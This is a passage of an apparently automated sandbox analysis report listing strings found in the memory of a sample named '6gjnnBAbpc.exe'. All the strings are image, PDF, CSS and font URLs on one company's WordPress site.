6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_06_INDUSTRIES_COSUMER-ELECTRONICS-50x
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_06_INDUSTRIES_COSUMER-ELECTRONICS-768
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_06_INDUSTRIES_COSUMER-ELECTRONICS.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-1024x342.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-150x50.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-260x87.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-300x100.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-50x17.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-768x256.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_02_AUF-EINEN-BLICK-1024x342.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_02_AUF-EINEN-BLICK-150x50.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_02_AUF-EINEN-BLICK-260x87.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_02_AUF-EINEN-BLICK-300x100.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_02_AUF-EINEN-BLICK-50x17.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_02_AUF-EINEN-BLICK-768x256.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_02_AUF-EINEN-BLICK.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2022/08/S30BW-9e22082315160.pdf
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/betheme/css/post-641.css?ver=1679460211
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/betheme/css/post-641.css?ver=1679460265
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/fonts/lato-v23-latin-300.eot
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/fonts/lato-v23-latin-300.eot?#iefix
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/fonts/lato-v23-latin-300.svg#Lato
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/fonts/lato-v23-latin-300.ttf
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/fonts/lato-v23-latin-300.woff
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/fonts/lato-v23-latin-300.woff2
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/fonts/lato-v23-latin-regular.eot
